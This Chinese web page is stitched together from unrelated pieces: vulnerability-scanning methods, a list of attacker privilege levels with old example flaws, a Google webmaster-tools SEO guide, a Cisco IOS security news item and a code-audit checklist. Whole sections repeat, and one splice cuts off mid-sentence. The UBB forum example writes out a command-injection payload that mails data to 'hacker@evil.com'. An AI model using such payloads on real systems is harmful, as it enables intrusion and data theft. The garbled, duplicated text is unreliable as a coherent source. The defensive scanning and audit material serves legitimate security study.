漏洞掃描有以下四種檢測技術(shù):
1.基于應用的檢測技術(shù)。它采用被動(dòng)的、非破壞性的辦法檢查應用軟件包的設置,發(fā)現安全漏洞。
2.基于主機的檢測技術(shù)。它采用被動(dòng)的、非破壞性的辦法對系統進(jìn)行檢測。通常,它涉及到系統的內核、文件的屬性、操作系統的補丁等。這種技術(shù)還包括口令解密、把一些簡(jiǎn)單的口令剔除。因此,這種技術(shù)可以非常準確地定位系統的問(wèn)題,發(fā)現系統的漏洞。它的缺點(diǎn)是與平臺相關(guān),升級復雜。
3.基于目標的漏洞檢測技術(shù)。它采用被動(dòng)的、非破壞性的辦法檢查系統屬性和文件屬性,如數據庫、注冊號等。通過(guò)消息文摘算法,對文件的加密數進(jìn)行檢驗。這種技術(shù)的實(shí)現是運行在一個(gè)閉環(huán)上,不斷地處理文件、系統目標、系統目標屬性,然后產(chǎn)生檢驗數,把這些檢驗數同原來(lái)的檢驗數相比較。一旦發(fā)現改變就通知管理員。
4.基于網(wǎng)絡(luò )的檢測技術(shù)。它采用積極的、非破壞性的辦法來(lái)檢驗系統是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對系統進(jìn)行攻擊的行為,然后對結果進(jìn)行分析。它還針對已知的網(wǎng)絡(luò )漏洞進(jìn)行檢驗。網(wǎng)絡(luò )檢測技術(shù)常被用來(lái)進(jìn)行穿透實(shí)驗和安全審記。這種技術(shù)可以發(fā)現一系列平臺的漏洞,也容易安裝。但是,它可能會(huì )影響網(wǎng)絡(luò )的性能。
網(wǎng)絡(luò )漏洞掃描
在上述四種方式當中,網(wǎng)絡(luò )漏洞掃描最為適合我們的Web信息系統的風(fēng)險評估工作,其掃描原理和工作原理為:通過(guò)遠程檢測目標主機TCP/IP不同端口的服務(wù),記錄目標的回答。通過(guò)這種方法,可以搜集到很多目標主機的各種信息(例如:是否能用匿名登錄,是否有可寫(xiě)的FTP目錄,是否能用Telnet, ?Cl ?Cfroot,可以直接以root身份登錄到系統而無(wú)須提供口令。 二.本地管理員權限 攻擊者在已有一個(gè)本地賬號能夠登錄到系統的情況下,通過(guò)攻擊本地某些有缺陷的suid程序,競爭條件等手段,得到系統的管理員權限。
典型漏洞: 1、RedHat Linux的restore是個(gè)suid程序,它的執行依靠一個(gè)中RSH的環(huán)境變量,通過(guò)設置環(huán)境變量PATH,可以使RSH變量中的可執行程序以root身份運行,從而獲得系統的root權限。 2、Solaris 7的Xsun程序有suid位,它對輸入參數未做有效的邊界檢查,可以很容易地溢出它的緩沖區,以root身份運行我們指定的代碼,從而獲得管理員權限。
3、在windows2000下,攻擊者就有機會(huì )讓網(wǎng)絡(luò )DDE(一種在不同的Windows機器上的應用程序之間動(dòng)態(tài)共享數據的技術(shù))代理在本地系統用戶(hù)的安全上下文中執行其指定的代碼,從而提升權限并完全控制本地機器。 三.普通用戶(hù)訪(fǎng)問(wèn)權限 攻擊者利用服務(wù)器的漏洞,取得系統的普通用戶(hù)存取權限,對UNIX類(lèi)系統通常是shell訪(fǎng)問(wèn)權限,對Windows系統通常是cmd.exe的訪(fǎng)問(wèn)權限,能夠以一般用戶(hù)的身份執行程序,存取文件。
攻擊者通常攻擊以非root身份運行的守護進(jìn)程,有缺陷的cgi程序等手段獲得這種訪(fǎng)問(wèn)權限。 典型漏洞: 1、UBB是個(gè)廣泛運行于各種UNIX和Windows系統的論壇程序,用PERL實(shí)現,它的5.19以下版本存在輸入驗證問(wèn)題,通過(guò)提交精心構造的表單內容,可以使UBB去執行shell命令,因為一般的web服務(wù)器以nobody身份運行,因此可以得到一個(gè)nobody shell。
比如提交這樣的數據:topic='012345.ubb mail hacker@evil.com 2、RedHat Linux 6.2帶的innd 2.2.2.3版新聞服務(wù)器,存在緩沖區溢出漏洞,通過(guò)一個(gè)精心構造的新聞信件可以使innd服務(wù)器以news身份運行我們指定的代碼,得到一個(gè)innd權限的shell。 3、Windows IIS 4.0-5.0存在Unicode解碼漏洞,可以使攻擊者利用cmd.exe以guest組的權限在系統上運行程序。
相當于取得了普通用戶(hù)的權限。 四.權限提升 攻擊者在本地通過(guò)攻擊某些有缺陷的sgid程序,把自己的權限提升到某個(gè)非root用戶(hù)的水平。
獲得管理員權限可以看做是一種特殊的權限提升,只是因為威脅的大小不同而把它獨立出來(lái)。 典型漏洞: 1、RedHat Linux 6.1帶的man程序為sgid man,它存在format bug,通過(guò)對它的溢出攻擊,可以使攻擊者得到man組的用戶(hù)權限。
2、Solaris 7的write程序為sgid tty,它存在緩沖區溢出問(wèn)題,通過(guò)對它的攻擊可以攻擊者得到tty組的用戶(hù)權限。 3、WindowsNT系統中,攻擊者能夠使系統中其他用戶(hù)裝入一個(gè)”特洛化”的porfile,使其他用戶(hù)執行攻擊者的惡意代碼,有時(shí)甚至是管理員。
愛(ài)問(wèn)網(wǎng)絡(luò ):
第一:robots文件檢查
整個(gè)網(wǎng)站不能收錄或某個(gè)目錄下所有頁(yè)面都不能收錄,經(jīng)常是因為robots.txt文件差錯引起的。網(wǎng)管工具抓工具權限部分顯示出Google所抓取的robots文件內容。站長(cháng)也可以在這里試驗不同的robots文件指令,然后輸入一個(gè)網(wǎng)址,測試網(wǎng)址是否可以被收錄,或是被禁止。
robots文件中的任何一個(gè)字母差錯都可能造成致命影響。有了這個(gè)工具,站長(cháng)可以確保robots文件中的每一行代碼正確,不會(huì )錯誤禁止應該被收錄的文件或目錄。
第二:首選域設置
站長(cháng)可以設置Google應該收錄帶還是不帶的網(wǎng)址版本,稱(chēng)為首選域。
當然,在Google網(wǎng)管工具設置的首選域對百度等其他搜索引擎完全不起作用。這只是解決Google網(wǎng)址規范化的輔助手段,不能完全依靠這個(gè)設置,正確合理的網(wǎng)站結構才是解決問(wèn)題的根本方法。站長(cháng)也可以在這部分設置網(wǎng)站目標地理區域。
第三:關(guān)鍵詞排名
在搜索查詢(xún)部分,網(wǎng)管工具列出網(wǎng)站獲得排名的關(guān)鍵詞有哪些,并且列出了搜索結果顯示次數、點(diǎn)擊次數、點(diǎn)擊率和平均排名。
網(wǎng)管工具則列出了網(wǎng)站真是排名及點(diǎn)擊數字。這也為SEO人員提供了搜索結果點(diǎn)擊分布的另一組數據,可以用于搜索流量預估。不過(guò),要注意的是,網(wǎng)管工具中列出的點(diǎn)擊率,很多時(shí)候與網(wǎng)站權重、知名度、頁(yè)面標題標簽的寫(xiě)作有很大關(guān)系,并不一定符合其他關(guān)鍵詞的點(diǎn)擊情況。
第四:外部鏈接
Google的link:指令非常不準確,基本不能用來(lái)看外部鏈接。網(wǎng)管工具中列出的外部鏈接則要準確的多,還有雅虎的linkdomain:指令查外鏈也不錯。而且可以看出是全站鏈接還是只鏈首頁(yè)。SEO人員可以一目了然的看到網(wǎng)站上哪些頁(yè)面最受歡迎。
第五:網(wǎng)站內容
網(wǎng)管工具關(guān)鍵詞部分實(shí)際上列出的是Google在網(wǎng)站上抓取的最常見(jiàn)關(guān)鍵詞。查看這些常見(jiàn)關(guān)鍵詞,對頁(yè)面尤其是首頁(yè)的文案撰寫(xiě)和修改有重要意義。
第六:內部鏈接
內部鏈接部分列出所有頁(yè)面的內部鏈接數。站長(cháng)可以從這些數據中大致看到網(wǎng)站內部鏈接結構是否有重大缺陷。如果全站主導航中出現的分類(lèi)首頁(yè)內部鏈接數非常低,很可能說(shuō)明導航系統有問(wèn)題。
內部鏈接數的另外一個(gè)作用是反映出網(wǎng)站收錄頁(yè)面數。Google的site:指令也不太準確,而且現在越來(lái)越不準確,經(jīng)常不能反映出收錄數字。網(wǎng)管工具中內部鏈接部分列出的首頁(yè)內部鏈接總數,大致上就相當于Google收錄的頁(yè)面總數,因為網(wǎng)站上每一個(gè)頁(yè)面都應該有到首頁(yè)的鏈接。
第七:抓取錯誤及統計
抓取錯誤部分列出404錯誤(頁(yè)面不存在)、被robots文件禁止而不能收錄的頁(yè)面等。
其中404錯誤對檢查網(wǎng)站上是否存在錯誤鏈接很有用。對每個(gè)404錯誤,網(wǎng)管工具都列出了到這個(gè)網(wǎng)址的鏈接。如果到不存在頁(yè)面的鏈接是網(wǎng)站內部發(fā)出的,說(shuō)明這些鏈接頁(yè)面上的鏈接地址有錯誤。如果鏈接向不存在頁(yè)面的是其他網(wǎng)站,站長(cháng)可以嘗試聯(lián)系對方更改錯誤鏈接到正確位置。
第八:HTML建議
查看Google的HTML建議是尋找網(wǎng)站上可能出現的復制內容的最簡(jiǎn)便方法。網(wǎng)管工具列出了重復的說(shuō)明標簽及標題標簽個(gè)數和具體頁(yè)面。標題標簽重復,實(shí)際上說(shuō)明這些頁(yè)面本身內容重復,往往是網(wǎng)站結構造成的。要注意的是,有時(shí)候網(wǎng)管工具中列出的數據并不完整,一般來(lái)說(shuō)博客上標題標簽重復的頁(yè)面絕不止兩頁(yè)。
第九:模擬蜘蛛抓取
站長(cháng)可以輸入自己網(wǎng)站上的任何一個(gè)網(wǎng)址,網(wǎng)管工具會(huì )發(fā)出Google蜘蛛,實(shí)時(shí)抓取頁(yè)面內容,并顯示出抓取的HTML代碼,包括服務(wù)器頭信息和頁(yè)面代碼。顯然這隊站長(cháng)確認轉向設置和檢查服務(wù)器是否正確返回內容很有幫助。另外,這個(gè)工具也可以用來(lái)檢查頁(yè)面是否被黑。有的時(shí)候hei/k放入的代碼會(huì )檢查瀏覽器類(lèi)型,如果是用戶(hù)使用的普通瀏覽器訪(fǎng)問(wèn)則返回正常內容,如果是搜索引擎蜘蛛訪(fǎng)問(wèn),才返回hei/k加上去的垃圾內容和垃圾鏈接。所以站長(cháng)自己訪(fǎng)問(wèn)頁(yè)面看不出任何問(wèn)題。Google蜘蛛抓取到的卻不是站長(cháng)自己看到的內容。這個(gè)工具可以幫助站長(cháng)檢查頁(yè)面是否存在安全漏洞。
第十:網(wǎng)站性能
網(wǎng)站速度現在越來(lái)越被重視,不僅對排名有影響,對用戶(hù)體驗也有很大的影響。
1、TCP數據包問(wèn)題:在特定版本的IOS中,存在內存泄漏漏洞,可導致DOS工具,美國CERT的一份安全警報如此寫(xiě)道。
2、IPv6路由數據幀頭缺陷:IOS可能不能正確的處理IPv6(互聯(lián)網(wǎng)協(xié)議第六版)數據包的特定格式的路由數據頭,可能導致一個(gè)DOS攻擊或者運行任何惡意代碼。IPv6是一套可以讓我們在互聯(lián)網(wǎng)上獲得更多IP地址一套規范。
3、欺騙性的IP選項漏洞:這是一個(gè)IOS在處理具有特定的欺騙性的IP選項的IPv4數據包的時(shí)候存在的安全漏洞,據CERT說(shuō),它也可以導致DOS攻擊或運行任意惡毒代碼。
CERT表示,所有三個(gè)漏洞都可能導致設備重新加載它的操作系統。這情況下,一種間接的持續性的DOS情況就有可能發(fā)生,因為數據包已經(jīng)不能通過(guò)該設備了。
據CERT表示,由于運行IOS的設備可能要針對許多其他的網(wǎng)絡(luò )來(lái)轉發(fā)數據,因此這種拒絕服務(wù)攻擊的間接影響所帶來(lái)的后果可能是 非常嚴重的。
據思科公司在其安全公告中表示,公司已經(jīng)發(fā)布了針對這些漏洞的補丁軟件。據思科公司補充道:它目前還不未得知有利用這些漏洞的攻擊出現。不過(guò),據IBM公司互聯(lián)網(wǎng)安全系統的安全戰略主管奧爾曼表示,由于這些漏洞的嚴重性,用戶(hù)需要盡快安裝補丁軟件。據他表示,從他們的監測來(lái)看,有許多黑客正在試圖利用這些漏洞。
建議使用金山清理專(zhuān)家或360安全衛士,掃描電腦上的漏洞,并修復。
有以下四種檢測技術(shù):
1、基于應用的檢測技術(shù)。
它采用被動(dòng)的、非破壞性的辦法檢查應用軟件包的設置,發(fā)現安全漏洞。
2、基于主機的檢測技術(shù)。
它采用被動(dòng)的、非破壞性的辦法對系統進(jìn)行檢測。通常,它涉及到系統的內核、文件的屬性、操作系統的補丁等。這種技術(shù)還包括口令解密、把一些簡(jiǎn)單的口令剔除。因此,這種技術(shù)可以非常準確地定位系統的問(wèn)題,發(fā)現系統的漏洞。它的缺點(diǎn)是與平臺相關(guān),升級復雜。
3、基于目標的漏洞檢測技術(shù)。
它采用被動(dòng)的、非破壞性的辦法檢查系統屬性和文件屬性,如數據庫、注冊號等。通過(guò)消息文摘算法,對文件的加密數進(jìn)行檢驗。這種技術(shù)的實(shí)現是運行在一個(gè)閉環(huán)上,不斷地處理文件、系統目標、系統目標屬性,然后產(chǎn)生檢驗數,把這些檢驗數同原來(lái)的檢驗數相比較。一旦發(fā)現改變就通知管理員。
基于目標的漏洞檢測技術(shù)。它采用被動(dòng)的、非破壞性的辦法檢查系統屬性和文件屬性,如數據庫、注冊號等。通過(guò)消息文摘算法,對文件的加密數進(jìn)行檢驗。這種技術(shù)的實(shí)現是運行在一個(gè)閉環(huán)上,不斷地處理文件、系統目標、系統目標屬性,然后產(chǎn)生檢驗數,把這些檢驗數同原來(lái)的檢驗數相比較。一旦發(fā)現改變就通知管理員。
4、基于網(wǎng)絡(luò )的檢測技術(shù)。
采用積極的、非破壞性的辦法來(lái)檢驗系統是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對系統進(jìn)行攻擊的行為,然后對結果進(jìn)行分析。它還針對已知的網(wǎng)絡(luò )漏洞進(jìn)行檢驗。網(wǎng)絡(luò )檢測技術(shù)常被用來(lái)進(jìn)行穿透實(shí)驗和安全審計。這種技術(shù)可以發(fā)現一系列平臺的漏洞,也容易安裝。但是,它可能會(huì )影響網(wǎng)絡(luò )的性能。
愛(ài)問(wèn)網(wǎng)絡(luò ):第一:robots文件檢查整個(gè)網(wǎng)站不能收錄或某個(gè)目錄下所有頁(yè)面都不能收錄,經(jīng)常是因為robots.txt文件差錯引起的。
網(wǎng)管工具抓工具權限部分顯示出Google所抓取的robots文件內容。站長(cháng)也可以在這里試驗不同的robots文件指令,然后輸入一個(gè)網(wǎng)址,測試網(wǎng)址是否可以被收錄,或是被禁止。
robots文件中的任何一個(gè)字母差錯都可能造成致命影響。有了這個(gè)工具,站長(cháng)可以確保robots文件中的每一行代碼正確,不會(huì )錯誤禁止應該被收錄的文件或目錄。
第二:首選域設置站長(cháng)可以設置Google應該收錄帶還是不帶的網(wǎng)址版本,稱(chēng)為首選域。當然,在Google網(wǎng)管工具設置的首選域對百度等其他搜索引擎完全不起作用。
這只是解決Google網(wǎng)址規范化的輔助手段,不能完全依靠這個(gè)設置,正確合理的網(wǎng)站結構才是解決問(wèn)題的根本方法。站長(cháng)也可以在這部分設置網(wǎng)站目標地理區域。
第三:關(guān)鍵詞排名在搜索查詢(xún)部分,網(wǎng)管工具列出網(wǎng)站獲得排名的關(guān)鍵詞有哪些,并且列出了搜索結果顯示次數、點(diǎn)擊次數、點(diǎn)擊率和平均排名。網(wǎng)管工具則列出了網(wǎng)站真是排名及點(diǎn)擊數字。
這也為SEO人員提供了搜索結果點(diǎn)擊分布的另一組數據,可以用于搜索流量預估。不過(guò),要注意的是,網(wǎng)管工具中列出的點(diǎn)擊率,很多時(shí)候與網(wǎng)站權重、知名度、頁(yè)面標題標簽的寫(xiě)作有很大關(guān)系,并不一定符合其他關(guān)鍵詞的點(diǎn)擊情況。
第四:外部鏈接Google的link:指令非常不準確,基本不能用來(lái)看外部鏈接。網(wǎng)管工具中列出的外部鏈接則要準確的多,還有雅虎的linkdomain:指令查外鏈也不錯。
而且可以看出是全站鏈接還是只鏈首頁(yè)。SEO人員可以一目了然的看到網(wǎng)站上哪些頁(yè)面最受歡迎。
第五:網(wǎng)站內容網(wǎng)管工具關(guān)鍵詞部分實(shí)際上列出的是Google在網(wǎng)站上抓取的最常見(jiàn)關(guān)鍵詞。查看這些常見(jiàn)關(guān)鍵詞,對頁(yè)面尤其是首頁(yè)的文案撰寫(xiě)和修改有重要意義。
第六:內部鏈接內部鏈接部分列出所有頁(yè)面的內部鏈接數。站長(cháng)可以從這些數據中大致看到網(wǎng)站內部鏈接結構是否有重大缺陷。
如果全站主導航中出現的分類(lèi)首頁(yè)內部鏈接數非常低,很可能說(shuō)明導航系統有問(wèn)題。內部鏈接數的另外一個(gè)作用是反映出網(wǎng)站收錄頁(yè)面數。
Google的site:指令也不太準確,而且現在越來(lái)越不準確,經(jīng)常不能反映出收錄數字。網(wǎng)管工具中內部鏈接部分列出的首頁(yè)內部鏈接總數,大致上就相當于Google收錄的頁(yè)面總數,因為網(wǎng)站上每一個(gè)頁(yè)面都應該有到首頁(yè)的鏈接。
第七:抓取錯誤及統計抓取錯誤部分列出404錯誤(頁(yè)面不存在)、被robots文件禁止而不能收錄的頁(yè)面等。其中404錯誤對檢查網(wǎng)站上是否存在錯誤鏈接很有用。
對每個(gè)404錯誤,網(wǎng)管工具都列出了到這個(gè)網(wǎng)址的鏈接。如果到不存在頁(yè)面的鏈接是網(wǎng)站內部發(fā)出的,說(shuō)明這些鏈接頁(yè)面上的鏈接地址有錯誤。
如果鏈接向不存在頁(yè)面的是其他網(wǎng)站,站長(cháng)可以嘗試聯(lián)系對方更改錯誤鏈接到正確位置。第八:HTML建議查看Google的HTML建議是尋找網(wǎng)站上可能出現的復制內容的最簡(jiǎn)便方法。
網(wǎng)管工具列出了重復的說(shuō)明標簽及標題標簽個(gè)數和具體頁(yè)面。標題標簽重復,實(shí)際上說(shuō)明這些頁(yè)面本身內容重復,往往是網(wǎng)站結構造成的。
要注意的是,有時(shí)候網(wǎng)管工具中列出的數據并不完整,一般來(lái)說(shuō)博客上標題標簽重復的頁(yè)面絕不止兩頁(yè)。第九:模擬蜘蛛抓取站長(cháng)可以輸入自己網(wǎng)站上的任何一個(gè)網(wǎng)址,網(wǎng)管工具會(huì )發(fā)出Google蜘蛛,實(shí)時(shí)抓取頁(yè)面內容,并顯示出抓取的HTML代碼,包括服務(wù)器頭信息和頁(yè)面代碼。
顯然這隊站長(cháng)確認轉向設置和檢查服務(wù)器是否正確返回內容很有幫助。另外,這個(gè)工具也可以用來(lái)檢查頁(yè)面是否被黑。
有的時(shí)候hei/k放入的代碼會(huì )檢查瀏覽器類(lèi)型,如果是用戶(hù)使用的普通瀏覽器訪(fǎng)問(wèn)則返回正常內容,如果是搜索引擎蜘蛛訪(fǎng)問(wèn),才返回hei/k加上去的垃圾內容和垃圾鏈接。所以站長(cháng)自己訪(fǎng)問(wèn)頁(yè)面看不出任何問(wèn)題。
Google蜘蛛抓取到的卻不是站長(cháng)自己看到的內容。這個(gè)工具可以幫助站長(cháng)檢查頁(yè)面是否存在安全漏洞。
第十:網(wǎng)站性能網(wǎng)站速度現在越來(lái)越被重視,不僅對排名有影響,對用戶(hù)體驗也有很大的影響。
建立安全模型
1、熟悉軟件功能、功能實(shí)現,配置等;
如:IIS的虛擬目錄、腳本映射;
2、根據功能,分析安全需求,建立安全模型;
IIS外掛,文件類(lèi)型識別,目錄正確識別;目錄限制;
外掛的特點(diǎn);權限不是在文件對象上,需要自己識別文件,所以需要識別出同一個(gè)文件的所有文件名;
3、根據安全需求,分析編程應注意的地方,重點(diǎn)檢查。
IIS要對../進(jìn)行檢測,連接文件的處理,識別出正確的目錄、文件名;編程接口完全按接口實(shí)現; 1、通讀原代碼;
2、安全需求里面重點(diǎn)需要檢測的地方;
3、搜索容易有問(wèn)題的函數調用,如strcpy、strcat、*printf、free、strncpy等;
4、常見(jiàn)一些編程問(wèn)題;一些變量類(lèi)型,如長(cháng)度變量用int,注意一些函數非直接返回賦值問(wèn)題等,一些邊界條件,記數從0開(kāi)始還是從1開(kāi)始。
5、分析緩沖區使用的代碼;
6、輸入輸出合法檢測;
7、編程接口調用;了解操作系統、基本文件、進(jìn)程調用等的特性;
8、數據結構;
9、安全領(lǐng)域的最小原則; 1、測試;
(1)、熟悉輸入輸出;
(2)、根據需要編寫(xiě)測試程序;
(3)、輸入輸出各種特殊情況測試,特殊字符、長(cháng)串;
(4)、安全需求需要檢測的一些條件測試;
2、反匯編分析;
(1)、閱讀理解反匯編代碼;
(2)、安全需求檢測的代碼分析;
(3)、調用接口代碼分析;
(4)、sub esp,xxx 代碼分析緩沖;
(5)、strcpy、strcat、*printf、free、strncpy等調用分析;
(6)、輸入輸出檢測;
3、跟蹤調試;
(1)、異常的攔截分析;
(2)、一些字符串的流向,讀寫(xiě)斷點(diǎn); 1、分析總結各種漏洞、漏洞原因、編程問(wèn)題,補丁修補方法,編程怎么避免。
2、對漏洞歸納分類(lèi),全面考慮;
聲明:本網(wǎng)站尊重并保護知識產(chǎn)權,根據《信息網(wǎng)絡(luò )傳播權保護條例》,如果我們轉載的作品侵犯了您的權利,請在一個(gè)月內通知我們,我們會(huì )及時(shí)刪除。
蜀ICP備2020033479號-4 Copyright ? 2016 學(xué)習?shū)B(niǎo). 頁(yè)面生成時(shí)間:4.104秒